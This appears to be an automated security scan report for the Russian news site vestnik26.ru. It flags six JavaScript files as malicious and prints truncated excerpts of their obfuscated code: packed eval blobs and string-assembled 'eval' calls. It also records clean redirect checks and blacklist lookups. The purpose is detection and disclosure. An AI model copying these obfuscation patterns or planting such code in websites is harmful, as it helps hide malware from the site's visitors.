Scanned pages/files
Request | Server response | Status |
http://www.vestnik26.ru/ | 200 OK Content-Length: 49112 Content-Type: text/html | clean |
http://www.vestnik26.ru/templates/00069/js/jquery.js | 200 OK Content-Length: 37255 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b) Antivirus reports:
| ||
http://www.vestnik26.ru/templates/00069/js/slider.js | 200 OK Content-Length: 6506 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function () {
$('img.menu_class1').click(function () { $('div.the_menu1').slideToggle('medium'); }); }); $(document).ready(function () { $('img.menu_class2').click(function () { $('div.the_menu2').slideToggle('medium'); }); }); d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];if(1){f='fromCh';f+='arC';f+='qgode'["subst Antivirus reports:
| ||
http://www.vestnik26.ru/engine/ajax/menu.js | 200 OK Content-Length: 9566 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var menuwidth='165px';var disappeardelay=1000;var hidemenu_onclick="yes";var ie4=document.all;var ns6=document.getElementById&&!document.all;if(ie4||ns6)document.write('<div id="dropmenudiv" style="visibility:hidden;position:absolute;z-index:100;width:'+menuwidth+';" onMouseover="clearhidemenu()" onMouseout="dynamichide(event)"></div>');function getposOffset(what,offsettype){var totaloffset=(offsettype=="left")?what.offsetLeft:what.offsetTop;var parentEl=what.offsetParent;whi Antivirus reports:
| ||
http://www.vestnik26.ru/engine/ajax/dle_ajax.js | 200 OK Content-Length: 11331 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a 2D(){7 z=9.I("1F");6(z!=C){z.h.1G="2E";z.h.O=1H().18+\'1i\'}};a 1H(){7 d=9,w=m,P=d.1I&&d.1I!=\'2F\'?d.s:d.t;7 b=d.t;7 1J=(w.Q&&m.1K)?w.Q+w.1K:1j.1k(b. Antivirus reports:
| ||
http://www.vestnik26.ru/engine/ajax/js_edit.js | 200 OK Content-Length: 13377 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5 L=l O();5 T=l O();5 1u;5 1v;5 1w;5 1x;7 2X(1a,1S,1T,1U){5 d=l O();d[0]=\'<a s="2Y://2Z.30.31/32/?1y=\'+1a+\'" 1b="1c">\'+1S+\'</a>\';d[1]=\'<a s="\'+e+ Antivirus reports:
| ||
http://www.vestnik26.ru/engine/classes/highslide/highslide.js | 200 OK Content-Length: 42150 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('u m={S:{7J:\'8c\',92:\'ar...\',87:\'7p 1K aj\',ag:\'7p 1K an 1K al\',7Y:\'aq 1K aX H (f)\',9K:\'aZ by <i>9e 8b</i>\',9H:\'b0 1K aW 9e 8b aS\',7l:\ Antivirus reports:
| ||
http://js.smi2.ru/data/js/30522.js | 200 OK Content-Length: 3973 Content-Type: application/javascript | clean |
http://www.vestnik26.ru/index.php?do=feedback | 200 OK Content-Length: 36594 Content-Type: text/html | clean |
http://www.vestnik26.ru/sitemap.xml | 200 OK Content-Length: 4280 Content-Type: application/xml | clean |
http://www.vestnik26.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.vestnik26.ru/engine/rss.php | 200 OK Content-Length: 34893 Content-Type: application/xml | clean |
http://www.vestnik26.ru/news/our_news/politics/ | 200 OK Content-Length: 36037 Content-Type: text/html | clean |
http://www.vestnik26.ru/news/our_news/economy/ | 404 Not Found Content-Length: 34278 Content-Type: text/html | clean |
http://www.vestnik26.ru/news/our_news/agriculture/ | 200 OK Content-Length: 35857 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vestnik26.ru
Result:
GET / HTTP/1.1
Host: vestnik26.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: vestnik26.ru
Referer: http://www.google.com/search?q=vestnik26.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vestnik26.ru
Referer: http://www.google.com/search?q=vestnik26.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vestnik26.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vestnik26.ru/
Result: vestnik26.ru is not infected or malware details are not published yet.
Result: vestnik26.ru is not infected or malware details are not published yet.